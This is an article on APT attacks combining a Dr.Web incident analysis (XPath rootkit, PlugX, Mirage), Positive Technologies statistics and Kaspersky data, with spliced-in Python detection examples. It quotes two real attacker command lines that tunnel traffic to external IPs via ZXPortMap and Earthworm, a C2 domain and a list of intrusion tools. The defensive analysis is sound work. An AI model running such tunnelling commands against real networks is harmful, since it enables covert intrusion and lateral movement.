The studied malware samples and the utilities used by attackers suggest the following attack scenario. After exploiting vulnerabilities and gaining access to a network computer, attackers downloaded one of the modifications of the BackDoor.PlugX family Trojan to it. The Trojan's payload modules made it possible to remotely control the infected computer and use it to further advance through the network. Another Trojan believed to be used for primary infection was BackDoor.Whitebird.1. The backdoor was intended for 64-bit operating systems and had quite universal functionality: support for an encrypted connection to the control server, as well as file manager, proxy and remote management functions through the command shell.

After establishing the presence on the network, the hacker group used specialized malware to solve the tasks. The distribution of specialized Trojan programs to infected devices is presented below.

  • Domain controller #1:
    • Trojan.Misics
    • Trojan.XPath

  • Domain controller #2:
    • Trojan.Misics
    • Trojan.Mirage

  • Domain controller #3:
    • BackDoor.Mikroceen
    • BackDoor.Logtu

  • Server #1:
    • BackDoor.Mikroceen

  • Server #2:
    • Trojan.Mirage
    • BackDoor.CmdUdp.1

Of these Trojans, the XPath family deserves special attention, whose representatives, according to Dr.Web experts, were not previously publicly described. The family has a rootkit to hide network activity and traces of presence in a compromised system, which was discovered using the Dr.Web anti-rootkit installed on the attacked server. The samples studied were compiled in 2017-2018. At the same time, these programs are based on open source projects that were released several years earlier. Thus, the tested samples used versions of the 2013-2015 WinDivert package. This indirectly indicates that the first XPath modifications could also have been developed during this period.

XPath is a modular Trojan, each component of which corresponds to a certain stage of the malware's operation. The process of infection begins with the operation of the installer component, detected as Trojan.XPath.1. The installer uses an encrypted configuration hard-coded in its body and starts the payload either by installing the driver or by COM Hijacking. The program uses the system registry to store its modules, while using both encryption and data compression.

Trojan.XPath.2 is a driver and serves to hide the presence of malicious activity in a compromised system by running another module in parallel. The driver has Chinese digital signatures, and its work is based on open source projects. Unlike other components stored in the system registry, the driver files are located on disk, while the program works secretly. In addition to hiding the driver file on disk, the component's tasks include injecting a payload loader into the lsass.exe process, as well as masking the Trojan's network activity. The operating scenario varies depending on the version of the operating system.

The original name of the third component is PayloadDll.c. The library, detected as Trojan.XPath.3, is an intermediate module and serves to inject the payload, which is stored in the registry, into the svhost.exe process by means of COM Hijacking.

The main functionality is contained in the payload module detected as Trojan.XPath.4. The component is written in C++ and is also based on open source projects. Like most of the malware examined in the study, this Trojan is designed to gain unauthorized access to infected computers and steal confidential data. Its feature is the ability to function in two modes. The first is Client Mode. In this mode, the Trojan connects to the control server and waits for incoming commands. The second is Agent Mode. In this mode, the Trojan.XPath.4 performs the functions of a server: it listens to certain ports, waiting for other clients to connect to them and sending commands to them. Thus, the developers provided a scenario for deploying a local control server inside the attacked network to redirect commands from the external control server to infected computers inside the network.

Other interesting finds include the peculiarity of implementing access to the command shell of the Mirage Trojan. To redirect the I/O of the command shell, the malware used files that we were able to obtain from the infected server. Thus, it was possible to see the commands executed by the attackers using the presented Trojan function, as well as the data received in response:

The windbg.exe file launched was the PortQry TCP/UDP port scanner.

During the investigation, Dr.Web specialists discovered evidence indirectly confirming the connection of targeted attacks on institutions of Central Asian states. For example, one of the BackDoor.PlugX.38 samples found used the nicodonald [.] accesscam [.] org domain as a control server, which was also used as a control server for the BackDoor.Apper.14, also known as ICEFOG NG. A few years ago, the backdoor of this family was discovered in a phishing letter sent to one of the state institutions in Kazakhstan. In addition, an RTF document installing this BackDoor.Apper.14 sample was first uploaded to VirusTotal from Kazakhstan on March 19, 2019.

An interesting find in the incident in Kyrgyzstan was the Logtu backdoor, found on an infected server along with Mikroceen. In addition to a similar set of malware used by the attackers, it is Mikroceen that allows us to talk about a possible connection between the two attacks: a sample of this highly specialized backdoor was found on both networks and in both cases was installed on a domain controller.

During the search for samples related to these attacks, a specially prepared backdoor was found that implements BIND Shell access to the command shell. The path to the debug symbols contains the name of the project in Chinese - 正向马源码, which may indicate the corresponding origin of the Trojan.

In addition to malware, the following publicly available utilities were used by attackers to further advance over the network:

  • Mimikatz
  • TCP Port Scanner V1.2 By WinEggDrop
  • Nbtscan
  • PsExec
  • wmiexec.vbs
  • goMS17-010
  • ZXPortMap v1.0 By LZX
  • Earthworm
  • PortQry version 2.0 GOLD

The following are examples of running some of the listed utilities.

  • ZXPortMap: vmwared.exe 21 46.105.227.110 53
  • Earthworm: cryptsocket.exe -s rssocks -d 137.175.79.212 -e 53
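Detection logic for the two invocations above, as an added example that is not from the Dr.Web study: it matches on the shape of the arguments rather than on the file name, since both tools ran under unrelated names. The log records are constructed (only the two command lines are the ones quoted above); the log format, file paths and rule names are assumptions.

```python
import ipaddress
import re

# Mode names accepted by Earthworm's -s option
EW_MODES = {"ssocksd", "rcsocks", "rssocks", "lcx_slave", "lcx_listen", "lcx_tran"}
# Assumed log format: key=value fields with the command line in double quotes
LINE_RE = re.compile(r'host=(?P<host>\S+) image=(?P<image>\S+) cmdline="(?P<cmd>[^"]*)"')

# Constructed process-creation records; lines 2 and 4 carry the command lines quoted above
SAMPLE_LOG = r'''
2020-02-03T09:14:02Z host=SRV1 image=C:\Windows\System32\PING.EXE cmdline="ping -n 3 10.0.0.5"
2020-02-03T09:20:41Z host=SRV1 image=C:\ProgramData\vmwared.exe cmdline="vmwared.exe 21 46.105.227.110 53"
2020-02-03T09:25:10Z host=SRV2 image=C:\Tools\backup.exe cmdline="backup.exe -s nightly -d D:\dumps"
2020-02-03T09:31:55Z host=SRV2 image=C:\ProgramData\cryptsocket.exe cmdline="cryptsocket.exe -s rssocks -d 137.175.79.212 -e 53"
'''


def _is_port(tok):
    return tok.isdecimal() and 0 < int(tok) < 65536


def _parse_ip(tok):
    try:
        return ipaddress.ip_address(tok)
    except ValueError:
        return None


def match_rules(cmdline):
    """Return (rule, remote_ip, remote_port) tuples for one command line."""
    args = cmdline.split()[1:]  # drop argv[0]: the file name is attacker-chosen
    hits = []
    # Rule 1: "-s <earthworm mode>", with -d/-e naming the remote end when present
    opts = {args[i]: args[i + 1] for i in range(len(args) - 1) if args[i].startswith("-")}
    if opts.get("-s", "").lower() in EW_MODES:
        hits.append(("earthworm_mode_args", opts.get("-d"), opts.get("-e")))
    # Rule 2: exactly "<port> <ip> <port>", the shape of the ZXPortMap example
    if (len(args) == 3 and _is_port(args[0])
            and _parse_ip(args[1]) is not None and _is_port(args[2])):
        hits.append(("portmap_positional_args", args[1], args[2]))
    return hits


def analyze(log_text):
    """Return one alert per rule hit; 'public' marks a non-private remote address."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        for rule, ip, port in match_rules(m.group("cmd")):
            addr = _parse_ip(ip) if ip else None
            alerts.append({
                "host": m.group("host"),
                "image": m.group("image").rsplit("\\", 1)[-1],
                "rule": rule,
                "remote": "%s:%s" % (ip, port),
                "public": bool(addr and not addr.is_private),
                # port 53 from a process that is not a resolver is itself worth a look
                "dns_port": port == "53",
            })
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        print(a["host"], a["image"], a["rule"], a["remote"], "public=%s" % a["public"])
```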

The APT group also actively used its own PowerShell scripts to collect information about an infected computer, other network devices, check control servers from an infected computer, and similar tasks. In addition, a PowerShell script was found to upload the entire contents of mailboxes of several employees of the organization from Microsoft Exchange Server.

During the investigation, Dr.Web specialists managed to find several families of Trojan programs used in these attacks at once. Analysis of samples and malicious activity showed that the hacking of the network infrastructure occurred long before the detection of the first signs of infection by employees of the organization. Unfortunately, such a scenario is one of the attributes of successful APT attacks, since significant resources of virus writers are always aimed at hiding their presence in the system.

The primary vector of infection remained outside the scope of the study, as did the overall picture of infection of the entire infrastructure. We are confident that the Trojans described in the study are only part of the malware involved in these attacks. The mechanisms used by hackers make it many times more difficult not only to detect an unauthorized intrusion, but also to regain control over network objects.

To minimize risks, you need to constantly monitor intranet resources, especially those servers that are of increased interest to attackers - domain controllers, mail servers, Internet gateways. In the event of a compromise of the system, an operational and correct analysis of the situation is required to develop adequate countermeasures.

2019

TAdviser and Microsoft study: 39% of Russian SMB companies faced targeted cyber attacks

According to a study by TAdviser and Microsoft in the fall of 2019, 39% of small and medium-sized businesses faced targeted attacks over the year. According to Positive Technologies, more than 50% of SMB companies assign a high level of danger to the risk of APT attacks.

Growth of targeted attacks in the third quarter

On November 22, 2019, Positive Technologies experts summed up the results of the third quarter of 2019. Among the main trends are an increase in the number of unique cyber incidents, high activity of APT cyber groups specializing in targeted attacks, as well as a twofold predominance of the share of cyber attacks aimed at stealing information over the share of financially motivated campaigns.

Dynamics of attacks according to Positive Technologies

The main trend is the predominance of targeted attacks over mass ones. Their share is 65% against 59% in the second quarter. According to Positive Technologies, government agencies, industrial companies, the financial sector and the field of science and education are of greatest interest to attackers. Throughout the third quarter, PT Expert Security Center (PT ESC) experts regularly recorded attacks by the TA505 APT group. The group's arsenal includes the banking Trojan Dridex, the Cryptomix ransomware, whose code is signed with certificates issued to dummy legal entities, the remote-control Trojans ServHelper and FlawedAmmyy, as well as the Upxxec plugin, capable of detecting and disabling a large number of anti-virus protection tools. In addition, PT ESC specialists recorded cyber attacks by APT groups RTM, Cobalt, Bronze Union, APT-C-35, KONNI, Gamaredon and others.

In the third quarter of 2019, the share of cyberattacks aimed at stealing information rose to 61% in attacks on legal entities and to 64% in attacks on individuals (58% and 55% in the second quarter). At the same time, the share of financially motivated campaigns does not exceed 31%.

Categories of victims of attacks according to Positive Technologies

In attacks on legal entities, a quarter of the total amount of stolen information is personal data. One in five attacks targeted individuals, with almost half (47%) of all data stolen from them - credentials in various systems (logins and passwords).

Positive Technologies experts recorded a decrease in the proportion of attacks that used cryptocurrency miners - to 3% in the case of organizations and to 2% in campaigns aimed at individuals. This may be associated with the gradual transition of attackers to malware that is capable of performing several functions at once. For example, the Clipsa Trojan is able to secretly mine cryptocurrency, steal passwords, replace the addresses of crypto wallets, and also launch brute force attacks against sites based on WordPress.

"Social engineering methods are still popular: in the third quarter, the share of attacks on legal entities with their use almost doubled - to 69% (from 37% in the previous quarter). In 81% of cases, infection of companies' infrastructure with malware begins with a phishing email, "

noted Yana Avezova, analyst at Positive Technologies

Types of malware used for attacks

The share of malware infections is growing. Three quarters of attacks on legal entities and 62% of attacks on individuals were accompanied by infections of various kinds of malware. If infection of the company's infrastructure begins, as a rule, with a phishing email, then individuals are more often victims as a result of visiting compromised web resources (in 35% of attacks against individuals).

Positive Technologies experts also found that at the end of summer, after several months of calm, one of the largest botnets in the world, Emotet, resumed activity. Botnet operators work according to the malware as a service (MaaS) scheme and provide cybercriminals with access to computers infected with Emotet for their further infection with other malware, for example Trickbot or Ryuk.

According to researchers, information about most cyber attacks on organizations is not made public due to reputational risks.

Analysis of peculiarities of APT attacks in industry and fuel and energy complex

On November 18, 2019, Positive Technologies announced that its experts had analyzed the activities of APT groups attacking Russian organizations over the past two years. Nine of them focus on organizations of the fuel and energy complex, and 13 groups target industrial companies. Some groups attacked both industrial and energy companies.

In the last two studies, Positive Technologies experts described the specifics of APT attacks on industrial companies and fuel and energy complex organizations. In addition, experts conducted a survey among visitors to the Positive Technologies website, the audience of the SecurityLab.ru Internet portal and members of a number of industry communities.

According to this survey, more than half (60%) of respondents from the industry and the fuel and energy complex admit that the likelihood of a successful cyber attack is quite high. At the same time, only 11% of the survey participants are confident that their company will be able to withstand the APT attack.

Most representatives of organizations believe that the main goal of an APT group attacking their companies would be to disrupt technological processes and disable infrastructure. At the same time, 55% of the survey participants reported that their organizations had already become victims of attacks. Every fourth participant noted that one of the results of such an attack was infrastructure downtime.

At the same time, many companies use only basic security tools that are practically useless to counter complex threats such as APT. Thus, only 5% of respondents working in industrial and fuel and energy companies reported that their organizations use specialized tools to combat targeted attacks.

In practice, typical security solutions are ineffective in countering APT attacks. Cyber groups obfuscate the code of their malware so that anti-virus solutions on employees' computers cannot recognize the threat at the time of the attack. Five of the nine groups aimed at the fuel and energy complex use a technique that runs malware directly in RAM and leaves no traces on the hard drive. Cybercriminals add special modules to their malware to determine the version of antivirus used in the system, as well as modules to detect execution in a sandbox or virtual environment, which allows them to bypass dynamic checks of security systems at the time of the attack.

Most APT groups encrypt the communication channel with command servers to hide malicious traffic and trick intrusion detection systems. In attacks on industrial companies, every second group (46%) uses known encryption algorithms for this purpose, and 38% use modified versions of them. Malicious traffic is often disguised as legitimate: in attacks on the industrial sector, 77% of APT groups exchange information with the command center over widespread protocols. Some groups aimed at the fuel and energy sector place command servers at addresses that are similar to the names of well-known companies in the industry.

Attackers are not stopped even by the complete isolation of the technological segment of the network from its corporate segment and the Internet. If their target is in the industrial segment, then removable media (for example, flash drives) with malware can be thrown into the company, or they can be connected to USB connectors of critical systems by an insider who has infiltrated the company (Replication Through Removable Media technique).

According to Alexei Novikov, director of the Positive Technologies Security Center (PT Expert Security Center), often a more effective approach to detecting APT is to identify the activity of attackers after entering the infrastructure:

Identifying an APT attack when an intruder enters a company is an extremely difficult task, but if the attacker's goal is to reliably gain a foothold in the IT infrastructure and control key systems for the longest possible time, then it can be detected at later stages of the attack, for example, when it moves between servers already on the internal network. Such movements certainly leave artifacts in network traffic and on the nodes themselves, this allows you to detect the previous penetration retrospectively and eliminate the threat before the attacker proceeds to active destructive actions or steals important information.

APT group Calypso attacks government agencies of 6 countries

On October 31, 2019, Positive Technologies announced that experts at its security expert center (PT Expert Security Center) had identified an APT group called Calypso. The group has been operating since 2016 and targets government agencies. As of October 2019, it operates in six countries.

According to experts, organizations from India (34% of victims), Brazil, Kazakhstan (18% each), Russia, Thailand (12% each) and Turkey (6%) have already suffered from the actions of the group. The attackers hacked into the network perimeter and placed a special program on it, through which they gained access to the internal networks of compromised organizations. As the investigation showed, the attackers move inside the network either by exploiting the MS17-010 remote code execution vulnerability, or by using stolen credentials.

The success of the attacks of this group is largely facilitated by the fact that most of the utilities it uses to promote within the network are widely used by specialists around the world for network administration. The grouping used public utilities and exploits, for example SysInternals, Mimikatz; EternalBlue, EternalRomance. With common exploits, criminals infect computers on the organization's local network and steal confidential data,
said Denis Kuvshinov, lead specialist of the cyber threats research group

According to Positive Technologies experts, an organization can prevent such attacks using specialized deep traffic analysis systems, which make it possible to detect suspicious activity at the initial stage of intruders' penetration into the local network and prevent them from gaining a foothold in the company's infrastructure. In addition, monitoring information security events and protecting the perimeter and web applications will help detect and counteract attacks.

According to the data obtained, the identified APT group is believed to have Asian roots and to be Chinese-speaking. In one of the attacks, the group used PlugX malware, which is traditionally used by many APT groups of Chinese origin, as well as the Byeby Trojan, which was used in the SongXY malware campaign in 2017. In addition, during separate attacks, attackers mistakenly revealed their real IP addresses belonging to Chinese providers.

APT group techniques in attacks on credit and financial institutions

On October 10, 2019, Positive Technologies reported that its experts had analyzed the tactics and techniques of ten APT groups that attacked financial companies over the past two years[18] and found out that each of them resorted to phishing, and that in search of bank systems on the network criminals use legitimate administration utilities and compromised credentials.

Figure 1. Top 5 estimated targets of APT groups (proportion of respondents representing financial companies)

The researchers talked about the techniques that APT groups use to penetrate the IT infrastructure of financial companies, and how they operate inside, and also found out at what stages an attack can be identified and money theft prevented.

Figure 2. Top 5 consequences of cyber attacks (proportion of respondents representing financial companies)

Experts called phishing the most common and effective way to penetrate the internal network of any company.

According to our data, 75% of banks are vulnerable to phishing attacks. This method has proven itself so well among cybercriminals that every APT group we have investigated has resorted to it, seen in attacks on the credit and financial sector,
says Ekaterina Kilyusheva, senior analyst at Positive Technologies

According to a study by Positive Technologies, financial institutions have a large budget for information security, and their security systems are at a high level. According to Alexei Novikov, director of the Positive Technologies security expert center (PT Expert Security Center), this explains the large number of techniques used by APT groups to bypass security tools.

Figure 3. Protections used in companies (proportion of respondents representing the financial industry)
For example, to avoid detection by an antivirus, malware is delivered to the infrastructure in packed and encrypted form (obfuscated files or information and software packaging techniques). Attackers can pass off malicious code as legitimate software by signing it with a digital certificate of a real company (code signing technique). To hide control channels and additional masking, well-known web services can be used, as in the case of the Carbanak group, which used Google Docs and Pastebin services to store its scripts,
notes Alexey Novikov

Figure 4. Common categories of victims (proportion of groups)

According to statistics, for several days, and sometimes weeks, attackers study the network in preparation for theft. Criminals actively move between network nodes in search of banking systems, using legitimate utilities for administration (service execution techniques and Windows admin shares) and compromised accounts. According to experts, it is at this stage that attackers leave many traces, and you can notice suspicious actions in the system. Constant monitoring of information security events, as well as in-depth analysis of network traffic in real time and in retrospect, can recognize an APT attack before criminals gain access to banking systems.
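The traces mentioned above can be searched for in Windows event logs. The following is an added example, not code from Positive Technologies or the original page: it correlates access to an administrative share (event 5140) with a service installed on the same host shortly afterwards (event 7045) and reports sources that repeat this on several hosts. The event field names, hosts, addresses and the five-minute window are assumptions, and the sample events are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

ADMIN_SHARES = ("ADMIN$", "C$")   # administrative shares used for remote file copy
WINDOW = timedelta(minutes=5)      # assumed correlation window

# Constructed, already-normalised events; field names are assumptions of this example.
# 5140 = a network share object was accessed, 7045 = a service was installed.
EVENTS = [
    {"time": "2019-09-03T02:14:07", "host": "FS01", "event_id": 5140,
     "share": r"\\*\ADMIN$", "user": "svc_backup", "src_ip": "10.0.5.23"},
    {"time": "2019-09-03T02:14:09", "host": "FS01", "event_id": 7045,
     "service_name": "xkqj", "image_path": r"%SystemRoot%\xkqj.exe"},
    {"time": "2019-09-03T02:31:40", "host": "DC01", "event_id": 5140,
     "share": r"\\*\ADMIN$", "user": "svc_backup", "src_ip": "10.0.5.23"},
    {"time": "2019-09-03T02:31:44", "host": "DC01", "event_id": 7045,
     "service_name": "pwzt", "image_path": r"%SystemRoot%\pwzt.exe"},
    # Administrator browsing C$; the service installed 30 minutes later is unrelated.
    {"time": "2019-09-03T09:00:00", "host": "FS01", "event_id": 5140,
     "share": r"\\*\C$", "user": "it_admin", "src_ip": "10.0.1.10"},
    {"time": "2019-09-03T09:30:00", "host": "FS01", "event_id": 7045,
     "service_name": "PrintDriverHost", "image_path": r"C:\Program Files\Vendor\pdh.exe"},
    # Local software install with no preceding remote share access.
    {"time": "2019-09-03T11:00:00", "host": "APP02", "event_id": 7045,
     "service_name": "UpdaterSvc", "image_path": r"C:\Program Files\Vendor\upd.exe"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def is_admin_share_access(event):
    """True for a 5140 event whose share name ends in ADMIN$ or C$."""
    if event.get("event_id") != 5140:
        return False
    return event.get("share", "").rsplit("\\", 1)[-1].upper() in ADMIN_SHARES


def find_remote_service_installs(events, window=WINDOW):
    """Pair each new service with admin-share accesses on that host within the window."""
    last_access = defaultdict(dict)   # host -> {src_ip: most recent access event}
    findings = []
    for ev in sorted(events, key=_ts):
        host = ev["host"]
        if is_admin_share_access(ev):
            last_access[host][ev["src_ip"]] = ev
        elif ev.get("event_id") == 7045:
            for src_ip, access in last_access[host].items():
                if _ts(ev) - _ts(access) <= window:
                    findings.append({
                        "host": host, "src_ip": src_ip, "user": access["user"],
                        "service_name": ev["service_name"],
                        "seconds_after_access": int((_ts(ev) - _ts(access)).total_seconds()),
                    })
    return findings


def fan_out(findings, min_hosts=2):
    """Sources that installed services on at least min_hosts different hosts."""
    hosts = defaultdict(set)
    for f in findings:
        hosts[f["src_ip"]].add(f["host"])
    return {src: sorted(h) for src, h in hosts.items() if len(h) >= min_hosts}


if __name__ == "__main__":
    found = find_remote_service_installs(EVENTS)
    for f in found:
        print(f)
    print("moving between hosts:", fan_out(found))
```

Because the function only needs stored events, the same pass can be run over archived logs to look for movement that was missed when it happened.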

FinCERT organizes a convenient and effective channel for exchanging information on threats between financial institutions. However, it is important not only to know about the latest indicators of compromise, but also to use technical solutions that can use such indicators, and most importantly, search for these indicators in the past. This approach helps to identify the presence of attackers in the infrastructure even if nothing was known about it at the time of the attack,
emphasizes Alexey Novikov
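Searching for indicators "in the past", as the quote above puts it, means matching newly received indicators against logs that were stored before the indicators were known. The following is an added example, not code from FinCERT, Positive Technologies or the original page: it matches a constructed indicator feed against constructed historical log records and reports how long each indicator had been present before it was published. All field names, hosts, domains, addresses and dates are assumptions.

```python
from datetime import date

# Constructed indicator feed: each entry carries the date it became known.
INDICATORS = [
    {"type": "domain", "value": "cdn-sync.example", "published": "2019-10-02"},
    {"type": "ip", "value": "203.0.113.45", "published": "2019-10-02"},
    {"type": "sha256", "value": "ab" * 32, "published": "2019-10-02"},
]

# Constructed historical records (DNS/proxy, network flow, process creation).
HISTORY = [
    {"date": "2019-07-14", "host": "ws-114", "domain": "Api.CDN-Sync.example."},
    {"date": "2019-08-01", "host": "srv-db2", "domain": "cdn-sync.example"},
    {"date": "2019-08-03", "host": "srv-db2", "dst_ip": "203.0.113.45"},
    {"date": "2019-09-20", "host": "ws-007", "domain": "notcdn-sync.example"},
    {"date": "2019-09-21", "host": "ws-007", "sha256": "cd" * 32},
]


def _norm_domain(name):
    return name.strip().rstrip(".").lower()


def _parent_domains(name):
    """'a.b.example' -> ['a.b.example', 'b.example', 'example'] (label-aware suffixes)."""
    labels = _norm_domain(name).split(".")
    return [".".join(labels[i:]) for i in range(len(labels))]


def build_index(indicators):
    """Map (type, normalised value) -> publication date."""
    index = {}
    for ind in indicators:
        value = ind["value"].strip().lower()
        if ind["type"] == "domain":
            value = _norm_domain(value)
        index[(ind["type"], value)] = date.fromisoformat(ind["published"])
    return index


def observables(record):
    """Yield every (type, value) key a log record can match on."""
    if "domain" in record:
        for parent in _parent_domains(record["domain"]):
            yield ("domain", parent)
    if "dst_ip" in record:
        yield ("ip", record["dst_ip"].strip())
    if "sha256" in record:
        yield ("sha256", record["sha256"].strip().lower())


def retro_hunt(indicators, history):
    """Return one report row per indicator that appears in the stored history."""
    index = build_index(indicators)
    hits = {}
    for rec in history:
        seen = date.fromisoformat(rec["date"])
        for key in observables(rec):
            if key not in index:
                continue
            hit = hits.setdefault(key, {"first": seen, "last": seen, "hosts": set()})
            hit["first"] = min(hit["first"], seen)
            hit["last"] = max(hit["last"], seen)
            hit["hosts"].add(rec["host"])
    report = []
    for (kind, value), hit in hits.items():
        report.append({
            "type": kind, "indicator": value,
            "first_seen": hit["first"].isoformat(),
            "last_seen": hit["last"].isoformat(),
            "hosts": sorted(hit["hosts"]),
            "days_before_publication": (index[(kind, value)] - hit["first"]).days,
        })
    return sorted(report, key=lambda row: row["first_seen"])


if __name__ == "__main__":
    for row in retro_hunt(INDICATORS, HISTORY):
        print(row)
```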

According to the data obtained, some financial institutions use only basic means of protection, which are not enough to timely identify complex targeted attacks and fully analyze the events that have occurred. Only 22% of respondents representing the financial industry believe that their company is able to repel attacks by APT groups. At the same time, 63% of respondents in practice faced the consequences of cyber attacks, and 34% admitted that the organization suffered direct financial losses.

According to Positive Technologies:

  • 5 out of 10 groups use compromised third-party resources to spread malware
  • 9 out of 10 groups use malicious scripts (Scripting)
  • 8 out of 10 groups encrypt malware (Obfuscated Files or Information)
  • 6 out of 10 groups inject malicious code into the memory of a legitimate process (Process Injection)
  • 5 out of 10 groups mask services (Masquerading)
  • 4 out of 10 groups sign malicious code with a digital certificate (Code Signing)
  • 4 out of 10 groups use popular web services to store malicious files (Web Service)
  • 4 out of 10 groups check for sandbox (Virtualization/Sandbox Evasion)

2017: Kaspersky Lab technology for protection against remote administration threats

On December 13, 2017, it became known about the registration of a Kaspersky Lab patent for a technology for protecting against targeted attacks.

The product is based on machine learning algorithms and automates the detection of one of the dangerous cybercriminal tools - utilities for covert remote control of a computer. At the same time, the technology works even in cases where criminals transfer data over encrypted communication channels.

Remote computer management utilities are used by target attack organizers to stealthily carry out malicious activity on victims' devices. After installation, the program receives administrator rights on the computer and gives attackers the opportunity to search for confidential information on it, which is then transmitted to the command server. Such a scenario is dangerous for corporate networks.

Kaspersky Lab technology analyzes the activity of all applications on the user's computer and detects cases of abnormal behavior. It tracks all dependencies between events on the device. By comparing them with established behavioral patterns, the technology decides whether a remote attack on the computer has been detected. Then it establishes which application is used for remote administration. The danger can come from both unknown utilities and compromised trusted applications or their individual components[19].

2016: Russian Embezzlement Market Assessment

2015: Overview of emerging APT-class threats

In the first half of the 2010s, Kaspersky Lab's Center for Global Research and Threat Analysis tracked the activities of more than 60 criminal groups responsible for cyber attacks around the world. Their members speak a variety of languages: Russian, Chinese, German, Spanish, Arabic, Persian and others.

Surveillance of the activities of these criminal groups allowed the company to compile a list reflecting emerging APT-class threats. Here are the main ones:

  • Merger of cybercrime and APT threats: from end users, the vector of attacks shifts to conducting targeted attacks against the banks themselves;

  • Fragmentation of large APT groups: As a result of successful activities to investigate large incidents and publish information about large hacker groups and their leaders, some of the largest and most famous APT groups will break up into smaller groups operating independently of each other. The result will be attacks on a wider front. Accordingly, more companies will suffer as attacks by smaller groups will be more diversified.

  • The development of malicious methods and techniques: in the near future, the company expected the emergence of more complex embedded malicious modules, improved methods of bypassing protection and more active use of virtual file systems (Turla and Regin campaigns can be cited as examples) to hide valuable tools and stolen data.

  • New methods of transferring stolen data: long gone are the days when attackers could simply install a backdoor on a corporate network and start downloading terabytes of data to FTP servers scattered around the world. Today, advanced groupings regularly use SSL, as well as non-standard data transfer protocols. In the coming years, a number of groups will include the use of cloud services in their arsenal, which will allow them to more effectively hide the sending of data stolen from victims.

  • New APT campaigns from unexpected sources: In 2014, we were faced with the fact that several countries publicly expressed interest in possessing the ability to carry out APT-class attacks. We predict that new countries will enter the "cyber arms race" that will acquire tools for cyber espionage.

  • "False flag" attacks: Given the growing desire of government agencies to publicly denounce attackers, we believe that APT groups will make appropriate changes to the organization of their activities and will more often conduct malicious campaigns in which attackers can use "inactive" malware, usually used by other APT groups, to confuse traces and complicate attribution.

  • Adding attacks on mobile devices to the arsenal of APT groups: we expect the active use of malware for mobile devices, primarily for devices running Android and jailbroken iOS.

  • APT + botnet: precisely calculated attack + mass surveillance. This year, new APT groups will join the trend of using point attacks in combination with attention-grabbing campaigns and organizing their own botnets.

  • Commercialization of APT campaigns and the private sector: In recent years, we have published many materials about malware created by companies such as HackingTeam and Gamma International - the most famous manufacturers of "legal" spyware. It's a high-yield, low-risk business. Therefore, we can expect the appearance of new players on the market of "legal" surveillance tools.

2014: Kaspersky Lab Data

In the summer of 2014, Kaspersky Lab published a study on Business Information Security. In the period from April 2013 to May 2014, 3900 respondents (representatives of companies with knowledge of information security risks and having an impact on IT processes in their organizations) from 27 countries of the world, including Russia, were interviewed.

The top three priorities of IT managers compared to the previous year have been dramatically changed. 41% of respondents cited data protection from targeted attacks as a top priority. A year ago, this item was not included in the list of priorities of IT managers. First of all, representatives of medium-sized businesses (43%) and large enterprises (38%) called their priority to protect against targeted attacks. Small businesses are less interested in the issue of targeted attacks (32%).

Source: Kaspersky Lab, 2014

At the same time, among external IT security incidents, targeted attacks are not massive (10%). The number of incidents is still dominated by malware (77%), spam (74%) and phishing attacks (28%). The increase in attention to targeted attacks, Kaspersky Lab analysts said, is primarily due to their consequences. For example, an attack by high-tech hackers on the large retailer Target allowed attackers to seize the personal data of 70 million customers of this chain store.


IT experts note that targeted attacks account for a small proportion of the incidents that have been consulted. However, most of the respondents note that to prevent targeted attacks and detect hacking attempts in a timely manner, security tools of a higher class than antivirus software will be required. Kaspersky Lab experts are confident that to minimize risks in the event of targeted attacks, companies should take an integrated approach to ensuring information security.


2011: The number of targeted attacks increased from 77 to 82 per day

The number of targeted attacks is growing: by the end of 2011 their number increased from 77 to 82 per day. Targeted attacks use social engineering and specialized malware to gain unauthorized access to confidential information. Traditionally, such attacks were aimed at the public sector and government bodies, but in 2011 their focus expanded.

Targeted attacks are not limited to large organizations. More than half of such attacks are directed at organizations with less than 2.5 thousand employees and almost 18% at organizations with less than 250 employees. These organizations can be attacked because they are in the supply chain or are partners in the ecosystem of large companies, while having weaker security systems. In addition, 58% of such attacks target ordinary employees: human resources, public relations and sales. People in these roles may not have access to the right information, but they can serve as an entry point into the company. Attackers can simply find their contacts on the network; in addition, these employees are used to receiving requests or files from unknown persons.

Notes